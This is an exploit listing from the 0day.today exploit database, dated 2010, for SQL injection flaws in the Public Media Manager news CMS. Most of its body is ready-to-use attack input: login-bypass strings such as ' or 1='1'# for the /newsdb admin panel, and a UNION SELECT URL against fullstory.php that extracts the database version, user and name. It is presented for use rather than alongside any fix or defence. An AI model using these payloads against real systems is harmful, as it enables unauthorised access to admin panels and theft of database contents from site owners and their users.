[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Public Media Manager SQLi vulns

Author
learn3r hacker
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-10667
Category
web applications
Date add
13-01-2010
Platform
unsorted
===============================
Public Media Manager SQLi vulns 
================================

Product name: Public Media Manager
 
This product, an online NEWS CMS, suffers from SQL injection in login so that we can bypass the login system.
Also, it suffers from SQLi in the GET variables which can be exploited to get different information from the database.
 
################ SQL Login Bypass #################
 
Admin panel located at: /newsdb
 
Username: validuser'#  [eg. admin'#]
Password: learn3r   [or whatever]
 
Username: ' or 1='1'#
Password: learn3r   [ or whatever]
 
################ SQL Injections ##################
 
[+] Exploit:
 
http://localhost/pmm-cms/NewsCMS/newsdb/fullstory.php?storyid=-1+union+all+select+1,concat(@@version,0x3a,user(),0x3a,database())
 
Maybe there are more vulns but I can't give more time in auditing codes.
 



#  0day.today [2024-12-26]  #